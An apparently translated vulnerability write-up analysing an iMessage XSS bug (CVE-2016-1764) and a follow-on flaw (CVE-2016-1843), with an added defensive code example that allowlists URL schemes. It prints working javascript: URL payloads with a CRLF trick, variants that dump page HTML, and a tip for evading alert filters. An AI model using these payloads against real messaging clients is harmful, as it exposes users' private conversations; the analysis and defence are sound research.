From old exploits to new vulnerabilities – iMessage 0day (CVE-2016-1843)

2016-10-29T00:00:00
ID MYHACK58:62201680684
Type myhack58
Reporter Anonymous
Modified 2016-10-29T00:00:00

Description

0x01 Introduction

Note: after this article was reported to the vendor, the "0day" described in it was assigned the vulnerability ID CVE-2016-1843.

A few days ago a foreign researcher published the details of an iMessage XSS vulnerability (CVE-2016-1764) that had been fixed by an update three months earlier:

https://www.bishopfox.com/blog/2016/04/if-you-cant-break-crypto-break-the-client-recovery-of-plaintext-imessage-data/
https://github.com/BishopFox/cve-2016-1764

The published write-up does not in fact give a detailed analysis of the trigger point. Analysing it myself on the basis of that information, I found a new 0day.

0x02 CVE-2016-1764 vulnerability analysis

The simplest payload that triggers CVE-2016-1764:

javascript://a/research?%0d%0aprompt(1)

As can be seen, this is clearly the usual javascript: protocol trick: the %0d%0a (CRLF) is not processed, and the result is XSS. This trick is fairly common when hunting for XSS.

It is worth mentioning why prompt(1) is used here rather than the alert(1) we normally use. In my tests alert did not pop up at all, and in addition many sites simply filter alert out, so a reminder to everyone: when testing for XSS, replacing alert with prompt is necessary.

When you encounter this kind of client-side XSS and want to analyse it, the first step should be to look at the location.href information, mainly to see which domain you are in. This vulnerability lives under the applewebdata:// protocol, which the original vulnerability analysis already states.

Then look at the specific trigger point. In a browser we can usually analyse the HTML source, but in a client you generally cannot see it, so here is a small trick:

javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)

This shows the HTML code in the head:

@media screen and (-webkit-device-pixel-ratio:2) {}
<link rel="stylesheet" type="text/css" href="file:///System/Library/PrivateFrameworks/SocialUI.framework/Resources/balloons-modern.css">

Continue with the code of the body:

javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)

<chatitem id="v:iMessage/xxx@xxx.com/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" contiguous="no" role="heading" aria-level="1" item-type="header">
  <header guid="v:iMessage/xxx@xxx.com/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx">
    <headermessage text-direction="ltr">“xxx@xxx.com” for iMessage communication</headermessage>
  </header>
</chatitem>
<chatitem id="d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" contiguous="no" role="heading" aria-level="2" item-type="timestamp">
  <timestamp guid="d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" id="d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx">
    <date date="481908183.907740">today 23:23</date>
  </timestamp>
</chatitem>
<chatitem id="p:0/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="text" group-last-message-ignore-timestamps="yes" group-first-message-ignore-timestamps="yes">
  <message guid="p:0/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" service="imessage" typing-indicator="no" sent="no" from-me="yes" from-system="no" from="B392EC10-CA04-41D3-A967-5BB95E301475" emote="no" played="no" auto-reply="no" group-last-message="yes" group-first-message="yes">
    <buddyicon role="img" aria-label="black brother"><div></div></buddyicon>
    <messagetext>
      <messagebody title="today 23:23:03" aria-label="javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)">
        <messagetextcontainer text-direction="ltr">
          <span style=""><a href=" " title="javascript://a/research? prompt(1,document.body.innerHTML)">javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)</a></span>
        </messagetextcontainer>
      </messagebody>
    </messagetext>
  </message>
</chatitem>
<chatitem id="p:0/AE1ABCF1-2397-4F20-A71F-D71FFE8042F5" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="text" group-last-message-ignore-timestamps="yes" group-first-message-ignore-timestamps="yes">
  <message guid="p:0/AE1ABCF1-2397-4F20-A71F-D71FFE8042F5" service="imessage" typing-indicator="no" sent="no" from-me="yes" from-system="no" from="B392EC10-CA04-41D3-A967-5BB95E301475" emote="no" played="no" auto-reply="no" group-last-message="yes" group-first-message="yes">
    <buddyicon role="img" aria-label="black brother"><div></div></buddyicon>
    <messagebody title="today 23:24:51" aria-label="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)">
    (remainder of this second balloon is truncated in the original)
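The body dump above shows the root cause from the client's side: the link detector turned the whole message string into an <a href> because it looked like a URL, and the javascript: scheme was not rejected. The following is an added example, not code from the original article or from Apple: a scheme-allowlist check that decides on the parsed scheme rather than on the raw string. The names safeHref, renderMessage, escapeHtml and ALLOWED_SCHEMES are hypothetical; the only API used is the WHATWG URL parser available as the global URL in Node.js and browsers.

```javascript
// Added example, not part of the original write-up. Demonstrates the defensive
// rule a message renderer needs: parse each link candidate as an absolute URL
// and render it as <a href> only if its scheme is on an explicit allowlist.

const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);

// Returns the normalised href to render, or null when the candidate must be
// shown as plain text (no <a> element at all).
function safeHref(candidate) {
  let url;
  try {
    url = new URL(candidate); // absolute URLs only; no base URL is supplied
  } catch (e) {
    return null;              // not parseable as an absolute URL
  }
  // Decide on the parsed scheme, never on the raw text: the parser has
  // already lower-cased the scheme, so "javascript:" is matched reliably
  // and the CRLF trick in the query string is irrelevant to the decision.
  if (!ALLOWED_SCHEMES.has(url.protocol)) return null;
  return url.href;
}

// Escapes the five HTML-significant characters for safe text insertion.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Renders one message body (hypothetical helper): text is always escaped, and
// only an allowlisted link is wrapped in an anchor.
function renderMessage(text) {
  const href = safeHref(text);
  const shown = escapeHtml(text);
  if (href === null) return shown;
  return `<a href="${escapeHtml(href)}">${shown}</a>`;
}

// Constructed inputs: the page's payload is rendered as inert text, a normal
// https link keeps its anchor.
console.log(renderMessage("javascript://a/research?%0d%0aprompt(1)"));
console.log(renderMessage("https://www.bishopfox.com/blog/"));
```

The same check applies to the title attribute: the trigger in the dump above put the payload into both the href and the title of the generated anchor, so any attribute derived from a link candidate must be built from the allowlisted, parsed URL rather than from the message text.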
